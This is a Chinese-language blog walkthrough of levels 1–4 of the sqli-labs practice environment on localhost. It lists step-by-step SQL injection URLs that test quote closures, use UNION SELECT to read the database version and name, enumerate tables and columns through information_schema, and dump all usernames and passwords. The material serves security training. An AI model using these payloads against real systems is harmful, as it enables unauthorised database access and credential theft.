sqli-labs-master less1-4通关

已于 2022-06-11 09:42:04 修改
阅读量384 收藏
点赞数
分类专栏: web安全 文章标签: 安全 web安全
于 2022-06-11 09:41:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43609884/article/details/125223967
版权

sqli-labs-master

Less01:字符型注入

 网址:http://localhost:8889/Less-1/

http://127.0.0.1/sqli-labs-master/Less-1/?id=1
http://127.0.0.1/sqli-labs-master/Less-1/?id=2
http://127.0.0.1/sqli-labs-master/Less-1/?id=2' --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=2' --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=2' and 1=2 --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=2' and sleep(5) --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=2' union select 1,2,3 --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-2' union select 1,2,3 --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-2' union select 1,version(),database() --+
//此时,已经获取到的信息有:数据库是security,版本信息:5.7.26
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,version(),group_concat(table_name) from information_schema.tables where table_schema=database() --+
//得出了表名:emails,referers,uagents,users
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_name='users' --+
//得出了users表的字段名,发现有username和password
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(0x5e,username,0x5c,password0x5e) from users --+
//获得了所有的账户和密码

 只显示了2,3,说明只有2和3可以当注入。

 数据库版本为5.7.26,数据库名为security。

security库的四个表:emails、referers、uagents、users


 

 user的三个列:id、username、password

获得用户名及密码 

Less02:数字型注入

 网址:http://localhost:8889/Less-2/

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=1 --+
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=2 --+
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=2 union select 1,2,3 --+

成功发现注入检测,后续注入手段与Less01类似 

Less03:字符型注入

网址:http://localhost:8889/Less-3/

​
http://localhost/sqli-labs-master/Less-3/?id=1
http://localhost/sqli-labs-master/Less-3/?id=1'
//报错:near ''1'') ,可以认为")为闭合条件
http://localhost/sqli-labs-master/Less-3/?id=1') --+
http://localhost/sqli-labs-master/Less-3/?id=1') and 1=1 --+
http://localhost/sqli-labs-master/Less-3/?id=1') and 1=2 --+
http://localhost/sqli-labs-master/Less-3/?id=1') and 1=2 union select 1,2,3 --+

​

成功发现注入检测,后续注入手段与Less01类似



http://localhost/sqli-labs-master/Less-1/?id=2' union select 1,2,3 --+
http://localhost/sqli-labs-master/Less-1/?id=-2' union select 1,2,3 --+
http://localhost/sqli-labs-master/Less-1/?id=-2' union select 1,version(),database() --+
//此时,已经获取到的信息有:数据库是security,版本信息:5.7.26
http://1localhost/sqli-labs-master/Less-1/?id=-1' union select 1,version(),group_concat(table_name) from information_schema.tables where table_schema=database() --+
//得出了表名:emails,referers,uagents,users
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_name='users' --+
//得出了users表的字段名,发现有username和password
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(username,password) from users --+
//获得了所有的账户和密码

Less04:字符型注入

 http://localhost:8889/Less-4/

http://localhost/sqli-labs-master/Less-4/?id=1
http://localhost/sqli-labs-master/Less-4/?id=1'
http://localhost/sqli-labs-master/Less-4/?id=1"
//报错:near '"1"") ,可以认为")为闭合条件
http://localhost/sqli-labs-master/Less-4/?id=1") --+
http://localhost/sqli-labs-master/Less-4/?id=1") and 1=1 --+
http://localhost/sqli-labs-master/Less-4/?id=1") and 1=2 --+
http://localhost/sqli-labs-master/Less-4/?id=1") and 1=2 union select 1,2,3 --+

 闭合检查成功,后续步骤同Less03

左天才右疯子
关注
专栏目录
sqli-labs—————Less-4
Fly_鹏程万里
05-08 676
Less4根据要求传入参数id,数据类型numeric添加单引号、and 1=1  、and 1=2进行测试感觉是不是非常奇怪,为什么都是正确显示页面呢?我们不妨再试试双引号注入代码之后,我们得到了下面这个错误You have an error in your SQL syntax; check the manual that corresponds to your MySQL server ve...
sqli-labs学习(less-1-less-4)
weixin_30908649的博客
11-25 192
学习sqli-labs之前先介绍一些函数,以便于下面的payload看的懂 group_concat函数 将查询出来的多个结果连接成一个字符串结果,用于在一个回显显示多个结果 同理的还有 concat_ws() limit star,size用法 start:从第几条记录开始。 size:读取几条记录。 sqli-lab-1 关键代码 $sql="SELE...
sqli-labs-less-4图文详解,适合小白
yzcn
10-23 1488
Less-4 less1-3以发布,1-4题相关知识点在https://blog.csdn.net/qq_46432288/article/details/109226871中,点击查看吧!!! less-4与1-3方法基本一致,只是最开始的判断注入点有一点差别。 判断注入: http://127.0.0.1/sqli-labs-master/Less-4/?id=1 显示正常 http://127.0.0.1/sqli-labs-master/Less-4/?id=1’ 显示正常 http://12
SQLi-labs-Master(1-22)新手通关宝典
Myosotis_LL的博客
05-18 2355
欢迎来到《SQLi-labs-Master新手通关宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入(SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 3189
sqli-labs靶场之前建议补一下基础。
Sqli-labs-master靶场1-20通关教程
weixin_68416970的博客
05-29 1186
Sqli-labs-master靶场1-20通关教程
Sqli-labs-master靶场1-10通关教程
weixin_68416970的博客
07-24 1806
Sqli-labs-master靶场1-10的通关教程
sqli-labs-master(Less1--Less5)
2301_81105268的博客
04-17 1161
MYSQL数据库的所有表的信息都存储在了information_schema数据库里面的tables这个表里(information_schema.tables中两列table_schema是数据库名,table_name中表名。from information_schema.tables即table_name的内容在这个数据库里的tables表里查询,并且有个条件是table_name这个表所属的数据库是security。由此可判断闭合为:')输入3显示正常,输入4报错,则判断数据库中的字段数为3。
sqli-labs通关(less1~less10)
热门推荐
箭雨镜屋
08-16 1万+
这10关都是GET型的,包括了union注入、报错注入、布尔盲注和时间盲注,虽然包含了几种闭合方式,但是没有涉及到过滤和绕过,是最基础的关卡。
Sqli-labs-master超详细通关教程(1-23关基础篇)
m0_67391270的博客
06-12 3277
一到四关主要是参数被包装的问题。一般用于尝试的语句Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23and1=2–+'and1=2–+"and1=2–+)and1=2–+')and1=2–+")and1=2–+"))and1=2–+图中显示的sql语句是我为了方便理解,修改了源代码显示出的id =1 and 1=2页面正常,考虑是否有字符注入,先加单引号可以看到提示,存在’ '包装,我们加上–+http://127.0.0.1:8080/sqli-labs-master/Less-1/?
sqli-labs-master Less1-9通关代码详解
qq_42906381的博客
02-15 2695
sqli-labs 1-9 通关代码详细
最详细的讲解 让你最快通关Less-9-Less-10/ --时间盲注http://127.0.0.1/sqli-labs-master/Less-10/ --时间盲注
m0_58883317的博客
04-17 5507
http://127.0.0.1/sqli-labs-master/Less-10/ --时间盲注 判断注入点 http://127.0.0.1/sqli-labs-master/Less-10/?id=1 and 1=1 and sleep(5) http://127.0.0.1/sqli-labs-master/Less-10/?id=1 and 1=1 and sleep(5) 根据页面显示我们可以知道使用联合注入是不可行的。页面无论对错都只显示you are in所以我们选择和less-9一样
sqli-labs 1-10通关教程
m0_51428325的博客
12-26 700
1.LOW <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query
sqli-labs第八关(布尔盲注)
qq_42266432的博客
08-19 1455
第八关看标题可知此关可以使用布尔盲注,布尔盲注我的理解是页面不会回显错误,但是注入等式或不等式时通过页面的反应能判断出注入中算式的true或false 布尔盲注的步骤如下: 获取数据库长度 获取数据库名 获取数据库表 获取表中字段 获取表中数据 先拿获取数据库长度举例 可以看到在length(database())>7时页面正常,length(database())>8时页面异常,即8>7=true,8>8=false,所以数据库名长度为8 再比如获取表名: 同理,sub
探索光耦:隔离电压——光耦保障电路安全与性能的关键
forvevr的博客
09-25 596
在实际应用中,光耦的隔离电压应根据工作环境中的电压等级、电流负载和潜在的电压波动来选择。比如,对于高压电力设备,建议选择隔离电压较高的光耦,以应对突发的电压尖峰或电流浪涌。在现代电子设备和系统中,电气隔离是保障电路稳定运行和安全的重要环节,而光耦(光电耦合器)则是实现这种隔离的核心元件之一。具有较高隔离电压的光耦能在这些波动和干扰中,稳定地工作,确保系统运行的连续性和可靠性。光耦通过将不同电位的电路有效隔离,避免了跨电路间的电流回流对低压电路元件的损害,延长了设备的使用寿命。
Splashtop 加入 Microsoft 智能安全协会
最新发布
SplashtopLoki的博客
09-27 392
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
浅谈软件安全开发的重要性及安全开发实践
esion23011的专栏
09-25 367
*制定安全开发可量化管理流程**:为了确保软件开发过程的安全性,企业应建立一套可量化、可追溯的安全开发管理流程。通过建立企业安全战略、制定安全开发管理流程、提高安全开发意识以及实施一系列安全开发实践措施,企业可以构建安全可靠的信息系统,为企业的持续发展和创新提供有力保障。**明确安全需求**:基于攻击面分析的结果,企业应明确软件系统的安全需求。**建立企业安全战略**:企业应根据国家法律法规要求、自身业务特点及软件应用系统的实际情况,制定符合自身需求的安全发展战略。#### 企业要怎么进行安全开发?
【注册/登录安全分析报告:孔夫子旧书网】
weixin_46641057的博客
09-27 578
孔夫子网简称孔网,创建于2002年,是大型的二手旧货、古旧图书和商品交易平台,是传统文化行业结合互联网而搭建的C2C平台,是有传统文化价值的旧货市场。网站主要板块是书店区和拍卖区。网站秉承“网罗天下图书,传承中华文明”的理念,致力于发掘、抢救、保护和传播中国传统文化资源。作为旧古书二手市场平台的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
sqli-labs-master/Less-17
07-28
Less-17 是一个 SQL 注入实验,它位于 sqli-labs-master 实验室的目录中。在这个实验中,你可以学习和实践 SQL 注入攻击的技术。 SQL 注入是一种常见的网络安全漏洞,它允许攻击者通过在应用程序的输入字段中注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值